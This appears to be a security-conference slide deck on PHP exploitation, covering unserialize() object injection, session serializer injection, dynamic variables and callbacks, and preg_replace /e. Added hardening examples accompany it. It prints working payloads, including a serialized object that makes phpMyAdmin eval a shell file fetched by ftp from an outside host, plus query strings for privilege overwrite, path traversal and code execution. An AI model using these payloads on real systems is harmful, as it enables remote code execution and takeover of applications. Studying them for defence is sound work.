PHP unserialize(), $_SESSION and dynamics.
Hints and Tricks
Where it all comes from

5 November 2009, Seoul, PoC2009 conference
"Shocking News in PHP Exploitation" - Stefan Esser
http://www.suspekt.org/downloads/POC2009-ShockingNewsInPHPExploitation.pdf
The gist of the vulnerability

User-supplied data reaches unserialize()
There is a class with magic methods: __destruct, __toString, __wakeup
These classes are reachable from the code that calls unserialize()
These methods contain some vulnerability (PHP injection, SQL injection, etc.)
$configuration = unserialize($_POST['configuration']);

function __wakeup() {
    $this->load();
    eval('?>' . trim(file_get_contents($this->getSource())));
}

O:10:"PMA_Config":1:{s:6:"source";s:70:"ftp://login:password@tvoy_host.com/www/shell.txt";}

phpMyAdmin <= 2.11.9
http://snipper.ru/view/12/phpmyadmin-2119-unserialize-arbitrary-php-code-execution-exploit/
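The three conditions above in one runnable file, as an added example that is not part of the original deck or of phpMyAdmin (the class name ConfigLoader is made up): the magic method only records that it ran, and the second half shows two ways to break the chain.

```php
<?php
// Added example (not from the original deck; the class name is made up): the
// three conditions above in one file, and how to break the chain.
class ConfigLoader {
    public static $woken = [];
    public $source = 'config.php';
    // A magic method that unserialize() reaches. In the phpMyAdmin case this
    // was eval()'ed file contents; here it only records that it ran.
    public function __wakeup() {
        self::$woken[] = $this->source;
    }
}

// Constructed attacker-shaped input: an object literal for a class the
// application happens to have loaded.
$untrusted = 'O:12:"ConfigLoader":1:{s:6:"source";s:23:"ftp://example.invalid/x";}';

// 1) As on the slide: any loaded class with __wakeup/__destruct/__toString
//    is instantiated and its magic method runs during unserialize().
unserialize($untrusted);
var_dump(ConfigLoader::$woken);   // array(1) { [0]=> "ftp://example.invalid/x" }

// 2) Hardened (PHP 7.0+): no class is instantiated, so no magic method runs.
ConfigLoader::$woken = [];
$obj = unserialize($untrusted, ['allowed_classes' => false]);
var_dump(get_class($obj));        // "__PHP_Incomplete_Class"
var_dump(ConfigLoader::$woken);   // array(0) { }

// 3) Better: keep PHP's serialization format away from untrusted input,
//    accept a plain data format instead, and build the object yourself.
$data = json_decode('{"source":"config.php"}', true);
$cfg = new ConfigLoader();
$cfg->source = is_string($data['source'] ?? null) ? $data['source'] : 'config.php';
```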
Anything else?

a:1:{a:1:{a:1:{a:1:{a:1:{a:1:{a:1:{a:1:{a:1:{a:1:{a:1:{a:1:{a:1:{a:1:{a:1:{...

DoS, as per Esser.
Information leak, Russian-style ;)
It crashes with:
Fatal error: Maximum execution time of 30 seconds exceeded in z:\home\www\a.php on line 493
Repeat N times, filter out the unique paths, order them by time, and you get a pile of the application's call sites.
http://www.xakep.ru/post/52630/default.asp
_SESSION (MOPS-2010-060)

PHP 5.2 <= 5.2.13
PHP 5.3 <= 5.3.2
$_SESSION[$_POST['prefix'] . 'bla'] = $_POST['data'];
or
$_SESSION = array_merge($_SESSION, $_POST);
prefix=!
data=|xxx|O:10:"evilObject":0:{}
This gives you the equivalent of unserialize()!
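What the "php" session serializer writes for the prefix=! / data=|xxx|... request above, and a guard for the $_SESSION[$untrustedKey] = ... pattern, as an added example that is not from the deck; the encoder is a simplified re-implementation for illustration, not PHP's own code, and session_set_checked is a made-up name.

```php
<?php
// Added example (not from the deck). php_handler_encode() is a simplified
// re-implementation of what session.serialize_handler=php writes: one record
// per variable in the form  name|serialized_value.
function php_handler_encode(array $vars): string {
    $out = '';
    foreach ($vars as $name => $value) {
        $out .= $name . '|' . serialize($value);
    }
    return $out;
}

// The decoder reads a name up to the first '|'; a name starting with '!' is the
// "undefined variable" marker and carries no value. The record below therefore
// begins with a skipped variable, and the decoder resumes scanning inside what
// was meant to be a string value, where "xxx|O:10:..." reads as a second
// variable xxx whose value is the injected object.
$key  = '!' . 'bla';                      // prefix=! followed by 'bla'
$data = '|xxx|O:10:"evilObject":0:{}';    // data=... from the request
echo php_handler_encode([$key => $data]), "\n";
// !bla|s:27:"|xxx|O:10:"evilObject":0:{}";

// Guard: only identifier-shaped names may become session variables, so the
// serializer's delimiters '|' and '!' never enter the record.
function session_set_checked(string $name, $value): void {
    if (!preg_match('/\A[A-Za-z_][A-Za-z0-9_]*\z/', $name)) {
        throw new InvalidArgumentException("rejected session variable name: $name");
    }
    $_SESSION[$name] = $value;
}

// On PHP >= 5.5.4, session.serialize_handler=php_serialize stores the whole
// $_SESSION as one serialize()'d array, so names are data, not delimiters.
```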
What makes this better than Esser's?

With REGISTER_GLOBALS=On:
! Reading (pulling into _SESSION) _SERVER, private class variables, etc.
test.php?prefix=!&data=|_SERVER|
! Overwriting _SERVER, private class variables, etc.
test.php?prefix=!&data=|_SERVER|a:1:{s:11:"REMOTE_ADDR";s:3:"!!!";}
Dynamic Variables

foreach ($_GET as $key => $value) {
    $$key = $value;
}

test.php?_SERVER[HTTP_HOST]=!!!
test.php?_SESSION[privileges]=admin
test.php?config[log_file]=../../../../../../../../../.htaccess
parse_str($_SERVER['QUERY_STRING']); // overwrites the _SERVER element given ?_SERVER[HTTP_HOST]=!!!
extract($_GET); // extract() takes an array; overwrites all of _SERVER given ?_SERVER[HTTP_HOST]=!!!
import_request_variables('GPC');

test.php?_SERVER[HTTP_HOST]=!!!
test.php?_SESSION[privileges]=admin
test.php?config[log_file]=../../../../../../../../../.htaccess
Dynamic Functions

$action = $_GET['action'];
$param = $_GET['param'];
$action($param);
Callbacks

In PHP5, about 40 functions take a callback:
$ucback = $_GET['callback'];
$ar = array(1, 3, 3, 7);
$na = array_map($ucback, $ar);

test.php?callback=phpinfo

ob_start, usort, uasort, uksort, array_filter, array_walk
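Allow-list replacements for both dynamic patterns above (the $$key / extract() variable import and the request-chosen callback), as an added example that is not from the deck; import_params, run_action and the ACTIONS table are made-up names.

```php
<?php
// Added example (not from the deck): allow-list replacements for the two
// dynamic patterns above. Function and variable names here are made up.

// Instead of  foreach ($_GET as $k => $v) { $$k = $v; }  or  extract($_GET):
// copy only declared names into an array, never into the symbol table, so
// _SERVER, _SESSION, config etc. cannot be reached from the query string.
function import_params(array $source, array $allowed): array {
    $params = [];
    foreach ($allowed as $name => $default) {
        $params[$name] = array_key_exists($name, $source) && is_scalar($source[$name])
            ? (string) $source[$name]
            : $default;
    }
    return $params;
}

// Instead of  $action($param)  or  array_map($_GET['callback'], $ar):
// map request values onto a fixed table of callables. is_callable() is not a
// filter: is_callable('system') is true.
const ACTIONS = [
    'upper' => 'strtoupper',
    'trim'  => 'trim',
];
function run_action(string $name, array $args): array {
    if (!array_key_exists($name, ACTIONS)) {
        throw new InvalidArgumentException("unknown action: $name");
    }
    return array_map(ACTIONS[$name], $args);
}

// Constructed request in the deck's shape; the superglobal-named key is dropped.
$get = ['_SERVER' => ['HTTP_HOST' => '!!!'], 'callback' => 'phpinfo', 'page' => '3'];
var_dump(import_params($get, ['page' => '1', 'sort' => 'name']));
// array(2) { ["page"]=> "3", ["sort"]=> "name" }

var_dump(run_action('upper', ['a', 'b']));      // array(2) { "A", "B" }
try {
    run_action($get['callback'], [1, 3, 3, 7]);  // 'phpinfo' is not in the table
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), "\n";                 // unknown action: phpinfo
}
```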
$bufout = 'system';
ob_start($bufout);
echo 'whoami';
ob_end_flush();

If you can influence the argument of ob_start, you can dump the buffer wherever you need, for example into system. More on ob_ separately :)
Old songs about the main thing

$assn = 'valid prefix' . $_GET['toas'] . ' any postfix';
assert($assn);
eval($assn);

$regexp = $_GET['rx'];
$var = '<tag>' . $_GET['vr'] . '</tag>';
preg_replace("/<tag>(.*?)$regexp<\/tag>/", '\1', $var);

test.php?rx=</tag>/e%00
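The preg_replace() pattern above with the user value escaped, plus the /e-style rewrite done with preg_replace_callback(), as an added example that is not from the deck; wrap_replace and wrap_replace_cb are made-up names, and $rx / $vr stand for the slide's rx= and vr= parameters.

```php
<?php
// Added example (not from the deck): the slide's preg_replace() with the
// user-controlled part escaped, and the /e use case done without /e.
// Function names are made up; $rx and $vr stand for the rx= and vr= parameters.

function wrap_replace(string $rx, string $vr): string {
    $var = '<tag>' . $vr . '</tag>';
    // preg_quote() escapes the delimiter, '<', '>' and a NUL byte ("\000"), so
    // the value can only match literally; it cannot close the pattern early or
    // append a modifier such as /e.
    $safe = preg_quote($rx, '/');
    return preg_replace("/<tag>(.*?)$safe<\\/tag>/", '\1', $var);
}

// Where the replacement needs code, use a callback instead of the /e modifier
// (removed in PHP 7.0): the callback receives the captures as plain strings.
function wrap_replace_cb(string $vr): string {
    return preg_replace_callback(
        '/<tag>(.*?)<\/tag>/',
        function (array $m): string { return strtoupper($m[1]); },
        '<tag>' . $vr . '</tag>'
    );
}

// Constructed input in the deck's shape: rx=</tag>/e%00
$rx = "</tag>/e\0";
echo preg_quote($rx, '/'), "\n";          // \<\/tag\>\/e\000
echo wrap_replace($rx, 'hello'), "\n";    // <tag>hello</tag>  (no match, unchanged)
echo wrap_replace_cb('hello'), "\n";      // HELLO
```

The same reasoning applies to the assert()/eval() lines above: string arguments to assert() are deprecated since PHP 7.2, and zend.assertions=-1 in production removes them entirely.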
Contacts:
D0znpp@ONSEC.RU
Questions???
